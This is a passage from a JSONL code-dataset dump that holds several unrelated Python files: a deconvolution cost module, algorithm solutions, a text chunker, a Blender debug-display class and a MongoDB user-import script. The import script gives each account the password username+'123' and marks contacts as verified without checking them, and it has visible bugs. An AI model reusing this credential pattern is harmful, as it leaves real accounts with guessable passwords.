x):\n \"\"\"Calculate sparsity component of the cost\n\n This method returns the l1 norm error of the weighted wavelet\n coefficients\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float sparsity cost component\n\n \"\"\"\n\n x = self.weights * self.wavelet.op(x)\n\n l1_norm = np.sum(np.abs(x))\n\n if self.verbose:\n print(' - L1 NORM:', l1_norm)\n\n return l1_norm\n\n def lowr_comp(self, x):\n \"\"\"Calculate low-rank component of the cost\n\n This method returns the nuclear norm error of the deconvolved data in\n matrix form\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float low-rank cost component\n\n \"\"\"\n\n x_prime = cube2matrix(x)\n\n nuc_norm = nuclear_norm(x_prime)\n\n if self.verbose:\n print(' - NUCLEAR NORM:', nuc_norm)\n\n return self.lambda_lowr * nuc_norm\n\n def psf_comp(self):\n \"\"\"Calculate PSF estimation component of the cost\n\n This method returns the l2 norm error of the difference between the\n initial PSF and the estimated PSF\n\n Returns\n -------\n float PSF cost component\n\n \"\"\"\n\n l2_norm = np.linalg.norm(self.grad._psf - self.grad._psf0)\n\n if self.verbose:\n print(' - L2 NORM (PSF):', l2_norm)\n\n return self.lambda_psf * l2_norm\n\n def calc_cost(self, *args):\n \"\"\"Get cost function\n\n This method calculates the cost\n\n Parameters\n ----------\n x : np.ndarray\n Deconvolved data array\n\n Returns\n -------\n float cost\n\n \"\"\"\n\n x = args[0]\n\n if self.positivity and self.verbose:\n print(' - MIN(X):', np.min(x))\n\n cost = 0.5 * self.grad_comp(x) ** 2\n\n if self.mode in ('sparse', 'all'):\n cost += self.sparse_comp(x)\n\n elif self.mode in ('lowr', 'all'):\n cost += self.lowr_comp(x)\n\n if self.grad.grad_type == 'psf_unknown':\n cost += self.psf_comp()\n\n return cost\n","repo_name":"dedale-fet/Distributed-Learning-Toolbox","sub_path":"Distributed Space Variant Deconvolution/lib/cost.py","file_name":"cost.py","file_ext":"py","file_size_in_byte":4529,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41528387637","text":"from collections import Counter as c\n\ninputWord = input()\nret = -1\nseparatedWord = c(inputWord)\n\n##print(separatedWord)\n\nfor idx,keyWord in enumerate(separatedWord):\n if(separatedWord.get(keyWord)==1):\n ret = idx\n ##print(ret)\n break\n\nprint(ret)\n\n## 시간 복잡도 o(n)\n## 공간 복잡도 o(1) -> 알파벳\n## Constraints:\n# 1 <= s.length <= 10^5\n# s consists of only lowercase English letters.","repo_name":"beomsun1234/TIL","sub_path":"algorithm/leetcode/387. First Unique Character in a String(optimal).py","file_name":"387. First Unique Character in a String(optimal).py","file_ext":"py","file_size_in_byte":421,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"37031525466","text":"#! /usr/bin/env python3\n\n# Make the transcript from POM lectures into 4096 words\n# Made this script to get around ChatGPT's token limit per prompt...\nimport sys\n\n\ndef main():\n if (len(sys.argv) < 2):\n print(\"Usage: ./pom_breaker.py file.txt\")\n exit(1)\n\n data = open(sys.argv[1]).read()\n data_len = len(data)\n times = data_len // 4096\n try:\n with open(\"out.txt\", \"w\") as file:\n ptr = 0\n for i in range(times):\n file.write(data[ptr: ptr + 4096] + '\\n')\n ptr += 4096\n file.write(data[ptr:] + '\\n')\n except Exception:\n print(\"Hehe\")\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"gdnand/scripts","sub_path":"pom_breaker.py","file_name":"pom_breaker.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"70777284922","text":"import csv\n\nimport requests\nimport math\nimport os\nimport re\nimport random\nfrom pymongo import MongoClient\n# import MySQLdb\nfrom datetime import datetime,timedelta\nfrom bson.objectid import ObjectId\n# from constants import *\nimport logging \n \n#Create and configure logger \nlogging.basicConfig(filename=\"newfile.log\", \n\t\t\t\t\tformat='%(asctime)s %(message)s', \n\t\t\t\t\tfilemode='w') \n#Creating an object \nlogger=logging.getLogger() \n#Setting the threshold of logger to DEBUG \nlogger.setLevel(logging.DEBUG)\n\nclass CreateUserTables:\n\tdef __init__(self, env):\n\t\ttry:\n\t\t\tif env:\n\t\t\t\tpass\n\t\t\t\t#for live enviroment\n\t\t\t\t#self.client = MongoClient(\"localhost\", 27017)\n\t\t\t\t#self.db = client.test_clickg\n\t\t\t\t#self.cgusernew = db.activity_cgusernew\n\t\t\telse:\n\t\t\t\tself.client = MongoClient(\"localhost\", 27017)\n\t\t\t\tself.db_cust = self.client.customer\n\t\t\t\tself.db_misc = self.client.cc_miscellaneous\n\t\t\t\tself.user_profile = self.db_cust.cc_user_profile\n\t\t\t\tself.user_account = self.db_cust.cc_user_account\n\t\t\t\tself.area_collection = self.db_misc.cc_area\n\t\t\t\t#connect to mysql\n\t\t\t\t# self.mysql_db = MySQLdb.connect(\"localhost\", \"lsp\", \"root\", \"root\")\n\t\t\t\t# self.mysql_cursor = self.mysql_db.cursor()\n\t\texcept:\n\t\t\tprint(\"could not connect with the db please check\")\n\t\telse:\n\t\t\tprint('connection established')\n\n\tdef get_aplha_username(self,val):\n\t\tgarbage_char = \"?.!/;:@$0123456789_()[]\"\n\t\tif not val.isalpha():\n\t\t\tfor char in garbage_char:\n\t\t\t\tval = val.replace(char,\"\")\n\t\treturn val\n\n\tdef c_user_profile(self, user=None):\n\t\twith open('/home/gautam/Downloads/lsp_deatils.csv', newline='') as csvfile:\n\t\t\treader = csv.DictReader(csvfile)\n\t\t\tfor row in reader:\t\t\t\t\n\t\t\t\t# if not row['GSTIN']:\n\t\t\t\t# \trow['GSTIN'] = None\n\t\t\t\t# if not row['PAN']:\n\t\t\t\t# \trow['PAN'] = None\n\t\t\t\tactive_status = True\n\t\t\t\tsp_business_name = row['sp_business_name'].lower()\n\t\t\t\tif row['Address']:\n\t\t\t\t\taddress = row['Address'].lower()\n\t\t\t\telse:\n\t\t\t\t\t#active_status = False\n\t\t\t\t\taddress = None\n\t\t\t\t# carcrewpoc = row['CarcrewPOC'].lower()\n\t\t\t\tsp_poc_name = row['sp_poc_name'].lower()\n\t\t\t\tif row['Source']:\n\t\t\t\t\temail = row['Source'].lower().strip(' ')\n\t\t\t\t\temail = None\n\n\t\t\t\tarea_id = None\n\t\t\t\tif row['cc_area_name']:\n\t\t\t\t\tif row['PinCode']:\n\t\t\t\t\t\tprint(\"pincode\")\n\t\t\t\t\t\tarea_details = self.area_collection.find({\n\t\t\t\t\t\t\t\"cc_area_name\":row['cc_area_name'],\n\t\t\t\t\t\t\t\"cc_area_pin_code\": row['PinCode'] \n\t\t\t\t\t\t})\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(\"missing pincode\")\n\t\t\t\t\t\tarea_details = self.area_collection.find({\n\t\t\t\t\t\t\t\"cc_area_name\":row['cc_area_name']\n\t\t\t\t\t\t})\n\n\t\t\t\t\tfor a in area_details:\n\t\t\t\t\t\tarea_id = str(a['_id'])\n\t\t\t\tinsert_lsp_data = {}\n\t\t\t\tinsert_lsp_data.update({\n\t\t\t\t\t'sp_cc_code' : None,\n\t\t\t\t\t'sp_business_name' : sp_business_name,\n\t\t\t\t\t'sp_business_pretty_name' : sp_business_name,\n\t\t\t\t\t'sp_business_addresses' : address,\n\t\t\t\t\t'sp_country_id' : '5c740b24e45cf77ac147a98a',\n\t\t\t\t\t'sp_state_id' : row['State'],\n\t\t\t\t\t'sp_city_id' : row['City'],\n\t\t\t\t\t'sp_area_id' : area_id,\n\t\t\t\t\t'sp_lat_code' : None,\n\t\t\t\t\t'sp_long_code' : None,\n\t\t\t\t\t'sp_registered_entity_name' : row['RegisteredEntityName'],\n\t\t\t\t\t'sp_registered_addresses' : None,\n\t\t\t\t\t'sp_is_rb_address_same' : False,\n\t\t\t\t\t'sp_gstin_number' : row['GSTIN'],\n\t\t\t\t\t'sp_pan_number' : row['PAN'],\n\t\t\t\t\t'sp_service_time_schedule' : None,\n\t\t\t\t\t'sp_service_off_day' : None,\n\t\t\t\t\t'sp_website_address' : None,\n\t\t\t\t\t'sp_poc_name' : sp_poc_name,\n\t\t\t\t\t'sp_poc' : row['sp_poc'],\n\t\t\t\t\t'sp_business_email' : row['Source'].lower(),\n\t\t\t\t\t'sp_service_up' : False,\n\t\t\t\t\t'sp_cc_category_type' : None,\n\t\t\t\t\t'sp_verfied_status' : None,\n\t\t\t\t\t'sp_is_verified' : False,\n\t\t\t\t\t'cc_project_id' : '5c740be7e45cf77ac07c27de',\n\t\t\t\t\t'cc_user_type_id' : row['Type'],\n\t\t\t\t\t'is_sp_published' : False,\n\t\t\t\t\t'is_active' : active_status,\n\t\t\t\t\t'cc_org_type_id' : None,\n\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t'updated_by' : row['updated_by']\n\t\t\t\t})\n\n\t\t\t\tlsp_resp = requests.post(\"http://127.0.0.1:8000/lsp-api/lsp-single\", \n\t\t\t\t\tjson=insert_lsp_data, headers={'content-type': 'application/json'})\n\n\n\t\t\t\tif lsp_resp.status_code == 201:\n\t\t\t\t\tsp_id = lsp_resp.json()['id']\n\n\t\t\t\t\t#enter data in user auth table for that lsp\n\t\t\t\t\tvalue = \"!d@$sfsdfsdf\"\n\t\t\t\t\tname_list = sp_business_name.split(\" \")\n\t\t\t\t\trand_no = random.randint(0, 9999)\n\t\t\t\t\tname_len = len(name_list)\n\t\t\t\t\tif name_len > 1:\n\t\t\t\t\t item = name_list[0]\n\t\t\t\t\t val = self.get_aplha_username(item)\n\t\t\t\t\t if not val:\n\t\t\t\t\t\t #item = name_list[1]\n\t\t\t\t\t\t val = self.get_aplha_username(name_list[1])\n\t\t\t\t\t if len(val) > 3:\n\t\t\t\t\t\t username = val[0:3]+'r'\n\t\t\t\t\t else:\n\t\t\t\t\t\t username = val+'v'\n\t\t\t\t\telif name_len == 1:\n\t\t\t\t\t\t username = val[0:3]+'u'\n\t\t\t\t\t\t username = val+'c'\n\t\t\t\t\trandom_str = ['yy', 'uu', 'jj', 'hh', 'kk','we','qq', 'w', 'e', 'm', 'b', 's','a', 'd', 'g', 'ds', 't', 'y', 'h', 'u', 'j', 'i', 'k', 'z', 'x', 'v', 'o', 'p']\n\t\t\t\t\tusername = username+random.choice(random_str)\n\t\t\t\t\tusername = username+'cclsp'+str(rand_no)\n\t\t\t\t\tuser_auth_data = {}\n\t\t\t\t\tuser_auth_data.update({\n\t\t\t\t\t\t'username' : username,\n\t\t\t\t\t\t'password' : username+'123',\n\t\t\t\t\t\t'email' : row['Source'],\n\t\t\t\t\t\t'cc_login_type' : 2,\n\t\t\t\t\t\t'cc_project_id' : '5c740be7e45cf77ac07c27de',\n\t\t\t\t\t\t'cc_user_type_id' : row['Type'], \n\t\t\t\t\t\t'cc_user_role' : \"lsp\",\n\t\t\t\t\t\t'object_id' : sp_id,\n\t\t\t\t\t\t'is_active' : active_status,\n\t\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t\t'updated_by' : row['updated_by']\n\t\t\t\t\t})\n\t\t\t\t\t\n\t\t\t\t\tauth_resp = requests.post(\"http://127.0.0.1:8000/login-api/user/\", \n\t\t\t\t\t\tjson=user_auth_data, headers={'content-type': 'application/json'})\n\n\t\t\t\t\tif auth_resp.status_code == 201:\n\t\t\t\t\t\tauth_id = auth_resp.json()['value']\n\t\t\t\t\t#user profile data insereted\n\t\t\t\t\t\tif name_len > 1:\n\t\t\t\t\t\t\titem = name_list[0]\n\t\t\t\t\t\t\tval = self.get_aplha_username(item)\n\t\t\t\t\t\t\tif not val:\n\t\t\t\t\t\t\t\tval = self.get_aplha_username(name_list[1])\n\t\t\t\t\t\t\t\tif not val:\n\t\t\t\t\t\t\t\t\tval = self.get_aplha_username(name_list[2])\n\t\t\t\t\t\t\tif len(val) > 10:\n\t\t\t\t\t\t\t first_name = val[0:10]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t first_name = val\n\t\t\t\t\t\t\tother_item = name_list[-1]\n\t\t\t\t\t\t\tother_val = self.get_aplha_username(other_item)\n\t\t\t\t\t\t\tif not other_val:\n\t\t\t\t\t\t\t\tother_val = self.get_aplha_username(name_list[-2])\n\t\t\t\t\t\t\t\tif not other_val:\n\t\t\t\t\t\t\t\t\tother_val = self.get_aplha_username(name_list[-3])\n\t\t\t\t\t\t\t\telse:\t\n\t\t\t\t\t\t\t\t\tother_val = first_name\n\t\t\t\t\t\t\tif len(other_val) > 10:\n\t\t\t\t\t\t\t last_name = other_val[0:10]\n\t\t\t\t\t\t\telse:\n\t\t\t\t\t\t\t last_name = other_val \n\t\t\t\t\t\telif name_len == 1:\n\t\t\t\t\t\t\titem = name_list[0]\n\t\t\t\t\t\t\tval = self.get_aplha_username(item)\n\t\t\t\t\t\t\tif not val:\n\t\t\t\t\t\t\t\tval = 'carcrew'\n\t\t\t\t\t\t\tfirst_name = val\n\t\t\t\t\t\t\tlast_name = val\n\n\t\t\t\t\t\tif len(first_name) <= 2:\n\t\t\t\t\t\t\tfirst_name = first_name+last_name\n\n\t\t\t\t\t\tif len(last_name) <= 2:\n\t\t\t\t\t\t\tlast_name = first_name+last_name\n\t\t\t\t\t\tfirst_name = first_name.lower()\n\t\t\t\t\t\tlast_name = last_name.lower()\n\t\t\t\t\t\t#add data to the user profile\n\t\t\t\t\t\tif row['Type'] != \"\":\n\t\t\t\t\t\t\tuser_type = ObjectId(row['Type'])\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tuser_type = None\n\n\t\t\t\t\t\tuser_profile_data = {}\n\t\t\t\t\t\tuser_profile_data.update({\n\t\t\t\t\t\t\t\t'user_auth_id': auth_id,\n\t\t\t\t\t\t\t\t# 'user_auth_id': '',\n\t\t\t\t\t\t\t\t'first_name': first_name.lower(),\n\t\t\t\t\t\t\t\t'last_name': last_name.lower(),\n\t\t\t\t\t\t\t\t'mobile_no': row['sp_poc'],\n\t\t\t\t\t\t\t\t'email': row['Source'].lower(),\n\t\t\t\t\t\t\t\t'is_profile_verified': {\t\n\t\t\t\t\t\t\t\t\t\"is_email_verified\": True,\n\t\t\t\t\t\t\t\t\t\"is_phone_verified\": True,\n\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t'cc_project_id': ObjectId(\"5c740be7e45cf77ac07c27de\"),\n\t\t\t\t\t\t\t\t'cc_default_profile': True,\n\t\t\t\t\t\t\t\t'profile_type': 1,\n\t\t\t\t\t\t\t\t'profile_max_lock_limit': 0,\n\t\t\t\t\t\t\t\t'is_profile_active': True,\n\t\t\t\t\t\t\t\t'country_id': ObjectId(\"5c740b24e45cf77ac147a98a\"),\n\t\t\t\t\t\t\t\t'state_id': ObjectId(row['State']),\n\t\t\t\t\t\t\t\t'city_id': ObjectId(row['City']),\n\t\t\t\t\t\t\t\t'area_id': ObjectId(area_id),\n\t\t\t\t\t\t\t\t'cc_user_type_id': user_type,\n\t\t\t\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t\t\t\t'updated_by' : row['updated_by'],\n\t\t\t\t\t\t\t\t'is_active': active_status\n\t\t\t\t\t\t\t})\n\t\t\t\t\t\tuser_profile_id = self.user_profile.insert(user_profile_data)\n\t\t\t\t\t\tuser_account_data = {}\n\t\t\t\t\t\tif address:\n\t\t\t\t\t\t\taddress1 = address[0:50]\n\t\t\t\t\t\t\taddress2 = address[50:]\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\taddress1 = None\n\t\t\t\t\t\t\taddress2 = None\n\n\t\t\t\t\t\tuser_account_data.update({\n\t\t\t\t\t\t\t\t\t# 'user_account_id': user_details[''],\n\t\t\t\t\t\t\t\t\t'user_auth_id': auth_id,\n\t\t\t\t\t\t\t\t\t'user_profile_id': ObjectId(user_profile_id),\n\t\t\t\t\t\t\t\t\t'user_account_mobile_no': row['sp_poc'],\n\t\t\t\t\t\t\t\t\t'user_account_email': row['Source'].lower(),\n\t\t\t\t\t\t\t\t\t'user_account_full_name': first_name+' '+last_name,\n\t\t\t\t\t\t\t\t\t\"user_account_street_address\" : {\n\t\t\t\t\t\t\t\t\t\t\"address1\" : address1,\n\t\t\t\t\t\t\t\t\t\t\"address2\" : address2\n\t\t\t\t\t\t\t\t\t},\n\t\t\t\t\t\t\t\t\t'user_account_address_landmark': '',\n\t\t\t\t\t\t\t\t\t'country_id': ObjectId(\"5c740b24e45cf77ac147a98a\"),\n\t\t\t\t\t\t\t\t\t'state_id': ObjectId(row['State']),\n\t\t\t\t\t\t\t\t\t'city_id': ObjectId(row['City']),\n\t\t\t\t\t\t\t\t\t'area_id': ObjectId(area_id),\n\t\t\t\t\t\t\t\t\t'user_pin_code': row['PinCode'],\n\t\t\t\t\t\t\t\t\t'user_geo_code': {},\n\t\t\t\t\t\t\t\t\t'user_account_default': True,\n\t\t\t\t\t\t\t\t\t'user_account_type': 2,\n\t\t\t\t\t\t\t\t\t'cc_project_id': ObjectId(\"5c740be7e45cf77ac07c27de\"),\n\t\t\t\t\t\t\t\t\t'cc_user_type_id': user_type,\n\t\t\t\t\t\t\t\t\t'created_by' : row['created_by'],\t\t\t\t\n\t\t\t\t\t\t\t\t\t'updated_by' : row['updated_by'],\n\t\t\t\t\t\t\t\t\t'is_active': active_status\n\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\tuser_account_id = self.user_account.insert(user_account_data)\n\t\t\t\t\telse:\n\t\t\t\t\t\tlogger.info({\"error for==> \" + sp_id :auth_resp.json()})\t\t\t\t\t\t\n\t\t\t\t\t\tprint({\"error for==> \" + sp_id :auth_resp.json()})\n\t\t\t\telse:\n\t\t\t\t\tlogger.info({\"error for==> \" + sp_business_name : lsp_resp.json()})\n\t\t\t\t\tprint({\"error for==> \" + sp_business_name : lsp_resp.json()})\n\t\t\t\t\t\t\t\nmig_user = CreateUserTables(0)\ncreate_user = mig_user.c_user_profile()","repo_name":"shrmasaurbh/scripts","sub_path":"lsp_import.py","file_name":"lsp_import.py","file_ext":"py","file_size_in_byte":9618,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"74681330039","text":"import bpy, bmesh\nimport numpy as np\nfrom mathutils import Vector, Matrix, Euler, Quaternion\n\nfrom .view import draw_display_view\nfrom .pixel import draw_display_px\nfrom .plot import Plot\n\n__all__ = ['Display']\n\n\nclass Display():\n \"\"\"\nThis is intended to help developing scripts by making\nit easyer to visualize things directly from scripts.\nLook in the 3DView N-Panel for the display options.\n\nusage:\n\ndspl = bpy.types.WindowManager.display\n\nThen in your script you can simply add stuff to visualize it.\nFor example:\n\nvecs = list of points\ndspl.add_points(vecs, 'list with my important points')\n\nwhen done or starting a new loop do\ndspl.clear() to clear all data\nor dspl.points.clear() for the subdicts.\n[points, edges, edge_chains, matrizies, eulers, quats, plots]\n\nAll objects are stored in a dictonary and can thus be overwritten\nor reaccessed later. The key is also the display name in the viewport.\n\nThe functions for adding all have a k (for key) value for this.\nIf it is unset the next free integer in the dict keys is used instead.\n\nUse dspl.set_transform(some_matrix) to transform all later added elements\nby that matrix (to put them into object-local-space). Alternatively use\ndspl.apply_transform(some_matrix, inv=False)\nto transform all those already set.\n\nFunctions for adding stuff:\nadd_point(point, k='')\nadd_points(points) # has no key. Is convinience to add a list of vecs\nadd_edge(edge, k='') --> edge = [point, point]\nadd_point_chain(points, k='') --> points = [point, point, ...]\nadd_matrix(matrix, k='')\nadd_euler(euler, k='')\nadd_quat(quat, k='')\nadd_bm(bm, k='') --> bm = BMesh\nadd_plotted_function(function, interval=[start, stop, step], k='')\nadd_plot(xvalues, yvalues, k='')\n\nWith add_plot you can visualize your own precomputed plots.\n\nPlotting of simple functions:\nThe function takes the interval as input args and plots the\nfunction output on y\n(function, interval[start, stop, step]], plot(key/display)name)\n\nPlot sinus:\ndspl.add_plotted_function(function=sin, interval=[0, 6, 0.1], k='sinus-plot')\nto overwrite the plot use same k value\n\nother example:\ndspl.add_plotted_function(lambda x: 1/(exp(x)),[-2 ,2, 0.1],0)\ndspl.add_plotted_function(lambda x: np.sin(x),[-np.pi ,np.pi, 0.1], k=1)\n\n\"\"\"\n draw_handle = []\n\n object_transform = Matrix()\n \n points = {}\n edges = {}\n point_chains = {}\n plots = {}\n matrizies = {}\n eulers = {}\n quats = {}\n bmeshs = {}\n\n display_view = draw_display_view\n display_px = draw_display_px\n\n def __init__(self):\n self.draw_start()\n\n def clear(self):\n \"\"\"Clear all display data.\"\"\"\n self.points.clear()\n self.edges.clear()\n self.point_chains.clear()\n self.plots.clear()\n self.matrizies.clear()\n self.eulers.clear()\n self.quats.clear()\n self.bmeshs.clear()\n \n self.tag_redraw_all_view3d()\n\n #SET \"ADDING\" TRANSFORM\n def set_transform(self, mat):\n \"\"\"mat: Matrix to transform the input by.\n Only points, edges and pointchains\"\"\"\n if type(mat) == Matrix:\n self.object_transform = mat\n\n #APPLY TRANFORM ON EXISTING ELEMENTS\n def apply_transform(self, mat=None, inv=False):\n \"\"\"Apply the transform (set in set_transform(matrix))\n to points, edges, point_chains.\n If mat is given apply that instead.\n inv: If True apply the invers\"\"\"\n if mat is None:\n mat = self.object_transform.copy()\n if inv:\n mat = mat.inverted()\n if self.points:\n for p in self.points.values():\n p[:] = mat * p\n if self.edges:\n for e in self.edges.values():\n e[:] = [mat * v for v in e]\n if self.point_chains:\n for chain in self.point_chains.values():\n chain[:] = [mat*v for v in chain]\n\n #ADD POINT\n def add_point(self, point, k=''):\n \"\"\"point: vector like iterable\n k: key(name) for the point\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.points.keys())\n try: hash(k)\n except: k = str(k)\n \n point = Vector(point).to_3d()\n point = self.object_transform * point\n self.points[k] = point\n\n self.tag_redraw_all_view3d()\n\n #ADD POINTS\n def add_points(self, points):\n \"\"\"Convinience add list of points\"\"\"\n for p in points:\n self.add_point(p)\n\n #ADD EDGE\n def add_edge(self, edge, k=''):\n \"\"\"edge: iterable thing with two vector like things\n k: key(name) for the edge\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.edges.keys())\n try: hash(k)\n except: k = str(k)\n \n edge = [Vector(v).to_3d() for v in edge]\n edge =[self.object_transform * v for v in edge]\n if (edge[0] - edge[1]).length == 0:\n return\n self.edges[k] = edge\n\n self.tag_redraw_all_view3d()\n\n #ADD EDGES\n def add_edges(self, edges):\n \"\"\"Convinience add list of edges\"\"\"\n for e in edges:\n self.add_edge(e)\n\n #ADD POINT CHAIN\n def add_point_chain(self, points, k=''):\n \"\"\"points: list of vector like things\n k: key(name) for the point chain\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.point_chains.keys())\n try: hash(k)\n except: k = str(k)\n \n points = [Vector(v).to_3d() for v in points]\n points = [self.object_transform * v for v in points]\n self.point_chains[k] = points\n\n self.tag_redraw_all_view3d()\n\n #ADD MATRIX\n def add_matrix(self, mat, k=''):\n \"\"\"mat: Matrix type\n k: key(name) for the matrix\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.matrizies.keys())\n try: hash(k)\n except: k = str(k)\n \n if type(mat) == Matrix:\n self.matrizies[k] = mat\n\n self.tag_redraw_all_view3d()\n\n #ADD EULER\n def add_euler(self, euler, k=''):\n \"\"\"euler: Euler type\n k: key(name) for the Euler\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.eulers.keys())\n try: hash(k)\n except: k = str(k)\n \n if type(euler) == Euler:\n self.eulers[k] = euler\n\n self.tag_redraw_all_view3d()\n\n #ADD QUATERNION\n def add_quat(self, quat, k=''):\n \"\"\"quat: Quaternion type\n k: key(name) for the Quaternion\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.quats.keys())\n try: hash(k)\n except: k = str(k)\n \n if type(quat) == Quaternion:\n self.quats[k] = quat\n\n self.tag_redraw_all_view3d()\n\n #ADD BMESH\n def add_bm(self, bm, k=''):\n \"\"\"bm: BMesh type\n k: key(name) for the bmesh\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.quats.keys())\n try: hash(k)\n except: k = str(k)\n if not isinstance(bm, bmesh.types.BMesh):\n print('Not a bmesh type', str(bm))\n return\n bm.verts.ensure_lookup_table()\n bm.edges.ensure_lookup_table()\n bm.faces.ensure_lookup_table()\n\n self.bmeshs[k] = bm\n\n self.tag_redraw_all_view3d()\n\n #ADD PLOTTED FUNCTION\n def add_plotted_function(self, function, interval=[0, 1, 0.1], k=''):\n \"\"\"function: some function with a single float input/output\n interval: [start, stop, step] for the input to function\n k: key(name) for the plot\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.plots.keys())\n try: hash(k)\n except: k = str(k)\n \n xvalues = np.arange(*interval)\n yvalues = [function(x) for x in xvalues]\n pl = Plot(xvalues, yvalues, name=str(k))\n self.plots[k] = pl\n \n self.tag_redraw_all_view3d()\n\n #ADD PLOT\n def add_plot(self, xvalues, yvalues=None, k=''):\n \"\"\"Add some precomputed values to a plot.\n If yvalues are None xvalues is used for y,\n x is then max(y))\"\"\"\n if not k and type(k) == str:\n k = next_int_key(self.plots.keys())\n try: hash(k)\n except: k = str(k)\n\n if yvalues is None:\n yvalues = xvalues\n if type(yvalues) == function: yvalues = yvalues()\n xvalues = np.arange(0, np.max(yvalues), np.max(yvalues)/len(yvalues))\n\n if not (all(np.isfinite(xvalues)) and all(np.isfinite(yvalues))):\n print('Not all finite numbers in plot. Aborting.')\n return\n\n pl = Plot(xvalues, yvalues, name=str(k))\n self.plots[k] = pl\n \n self.tag_redraw_all_view3d()\n\n ### INTERNAL FUNCTIONS\n def create_edge_list(self, points=[]):\n \"\"\"Returns the edges combining the list of points\"\"\"\n points = [list(v) for v in points]\n points = [Vector(v).to_3d() for v in points]\n points = [self.object_transform * v for v in points]\n edge_list = list(zip(points[:-1], points[1:]))\n return edge_list\n\n @classmethod\n def tag_redraw_all_view3d(self):\n context = bpy.context\n for window in context.window_manager.windows:\n for area in window.screen.areas:\n if area.type == 'VIEW_3D':\n for region in area.regions:\n if region.type == 'WINDOW':\n region.tag_redraw()\n\n def draw_start(self):\n SpaceView3D = bpy.types.SpaceView3D\n if self.draw_handle:\n return\n\n print('Starting Development Display Drawing')\n handle_pixel = SpaceView3D.draw_handler_add(self.display_px, (), 'WINDOW', 'POST_PIXEL')\n handle_view = SpaceView3D.draw_handler_add(self.display_view, (), 'WINDOW', 'POST_VIEW')\n self.draw_handle[:] = [handle_pixel, handle_view]\n\n self.tag_redraw_all_view3d()\n\n def draw_stop(self):\n SpaceView3D = bpy.types.SpaceView3D\n if not self.draw_handle:\n return\n\n print('Stopping Development Display Drawing')\n handle_pixel, handle_view = self.draw_handle\n SpaceView3D.draw_handler_remove(handle_pixel, 'WINDOW')\n SpaceView3D.draw_handler_remove(handle_view, 'WINDOW')\n self.draw_handle[:] = []\n\n self.tag_redraw_all_view3d()\n\n def __call__(self):\n if self.draw_handle:\n self.draw_stop()\n elif not self.draw_handle:\n self.draw_start()\n\n def __repr__(self):\n return 'Points: %d, Edges: %d, PointChains: %d,\\nMatrizies: %d, Eulers: %d, Quaternions: %d,\\nPlots: %d'%(\n len(self.points), len(self.edges), len(self.point_chains), len(self.matrizies),\n len(self.eulers), len(self.quats), len(self.plots))\n\n### UTILS\ndef next_int_key(keys):\n nums = []\n for k in keys:\n try:\n num = int(k)\n nums.append(num)\n except:\n pass\n if nums:\n return sorted(nums)[-1] + 1\n return 0\n\n","repo_name":"PyrokinesisStudio/development_display","sub_path":"display_class.py","file_name":"display_class.py","file_ext":"py","file_size_in_byte":11017,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"1452183972","text":"def solution(msg):\n answer = []\n findDict = {}\n\n for idx, val in enumerate(range(ord(\"A\"), ord(\"Z\")+1), start=1):\n findDict[chr(val)] = idx\n\n start = 0\n end = len(msg)\n\n while True:\n a = msg[start:end]\n if a in findDict:\n answer.append(findDict[a])\n if end >= len(msg):\n return answer\n else:\n findDict[a+msg[end]] = len(findDict) + 1\n start += len(a)\n end = len(msg)\n else:\n end -= 1","repo_name":"kimyenac/Algorithm","sub_path":"프로그래머스/lv2/17684. [3차] 압축/[3차] 압축.py","file_name":"[3차] 압축.py","file_ext":"py","file_size_in_byte":533,"program_lang":"python","lang":"it","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"8439311018","text":"import argparse\nimport logging\nimport json\nimport torch\nimport sys\nimport torch_tensorrt\n\nfrom nlp_pipeline.model import get_model, get_onnx_session\nfrom nlp_pipeline.tokenizer import get_tokenizer\nfrom nlp_pipeline.utils import load_config, set_log_path, get_args\nfrom nlp_pipeline.label import get_label_to_id\nfrom nlp_pipeline.dataset import get_feature_class\nfrom nlp_pipeline.dataset.utils import get_model_inputs\n\n\nlogger = logging.getLogger(__name__)\n\n\ndef build_jit_trace(args):\n args = load_config(args=args)\n set_log_path(args.output_dir)\n tokenizer = get_tokenizer(args=args)\n feature_class = get_feature_class(args)\n\n label_to_id, label_to_id_inv = get_label_to_id(tokenizer, args)\n args.label_to_id = label_to_id\n args.label_to_id_inv = label_to_id_inv\n\n data_dict = json.load(open(args.data_dir / args.data_config['test'], \"r\"))[0]\n feature = feature_class(\n data_dict=data_dict, tokenizer=tokenizer, args=args, diagnosis=False\n )\n\n feature_dict = feature.feature_dict\n model = get_model(args=args)\n model.set_return_logits()\n\n batch = dict()\n for col in feature_dict:\n batch[col] = torch.stack([feature_dict[col]], dim=0).to(torch.int32).to(args.device)\n print(batch[col].device)\n if 'label' in batch:\n del batch['label']\n\n x = tuple([batch[col].squeeze(-1) for col in batch])\n traced_model = torch.jit.trace(model, x)\n traced_model.save(\n 